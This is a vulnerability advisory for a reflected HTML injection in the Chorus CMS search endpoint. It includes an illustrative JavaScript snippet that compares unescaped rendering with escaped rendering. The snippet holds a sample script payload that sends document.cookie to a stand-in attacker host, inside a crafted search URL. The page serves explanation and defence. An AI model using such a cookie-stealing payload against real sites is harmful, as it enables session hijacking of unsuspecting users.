HTML Injection Flaw in Vox Media's Chorus CMS
CVE-2025-40730
4.8 MEDIUM
What is CVE-2025-40730?
CVE-2025-40730 is a reflected HTML injection (cross-site scripting) vulnerability in Vox Media's Chorus CMS. The 'q' parameter of the '/search' endpoint is reflected into the response without adequate output encoding, so an attacker can craft a URL whose query string carries HTML and script markup that executes in the browser of any user who opens the link. Because the injected script runs in the origin of the affected site, it can read data available to that page, including session cookies that are not marked HttpOnly, and send requests with the victim's session, enabling unauthorized actions on the victim's behalf. Exploitation requires user interaction: the victim must open the crafted URL.
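The following is an added illustration of the bug class described above (a search term reflected into the page as raw HTML) beside its hardened form. It is not Chorus CMS code: the handler shape, the function names, the site hostname and the attacker URL are assumptions made for the example, and the payload is constructed for demonstration only.

```javascript
// Added illustration of reflected HTML injection via a search parameter.
// NOT Chorus CMS code: handler shape, names and sample URL are assumptions.

// Escape the five characters that can break out of an HTML text node or a
// double/single-quoted attribute value. Correct for those two contexts only;
// input placed inside a <script> block or a URL needs context-specific encoding.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Extract the 'q' query parameter from a request URL, as a search handler would.
function getQuery(urlString) {
  const url = new URL(urlString);
  return url.searchParams.get("q") || "";
}

// Vulnerable pattern: the search term is concatenated into the page as markup,
// so any tags in it become part of the DOM and any script in it executes.
function renderSearchPageVulnerable(q) {
  return `<h1>Results for: ${q}</h1>`;
}

// Hardened pattern: the search term is escaped before landing in a text node,
// so the browser renders the payload as literal text instead of markup.
function renderSearchPageSafe(q) {
  return `<h1>Results for: ${escapeHtml(q)}</h1>`;
}

// Crude visibility check for the demo: does the rendered page contain an
// unescaped <script ...> tag? (Real detection must consider far more vectors.)
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker payload and URL (hypothetical hosts, not a real exploit).
// The payload is URL-encoded exactly as a browser would send it in the query string.
const payload = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>";
const craftedUrl = "https://news.example/search?q=" + encodeURIComponent(payload);

// Run both renderers over the same decoded 'q' value and report whether the
// injected script survives as markup.
function demo() {
  const q = getQuery(craftedUrl);
  return {
    vulnerable: containsInjectedScript(renderSearchPageVulnerable(q)),
    safe: containsInjectedScript(renderSearchPageSafe(q)),
  };
}

// demo() -> { vulnerable: true, safe: false }
```

Two practical notes. Escaping is context-specific: the helper above is right for text nodes and quoted attribute values, but a search term echoed into an inline script, an event-handler attribute or an href needs the encoding for that context, and a templating engine with contextual auto-escaping is the more reliable fix than hand-placed calls. Second, a Content-Security-Policy without 'unsafe-inline' and HttpOnly session cookies reduce what a successful injection can do, but they do not remove the underlying flaw.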
Affected Version(s)
Chorus CMS all versions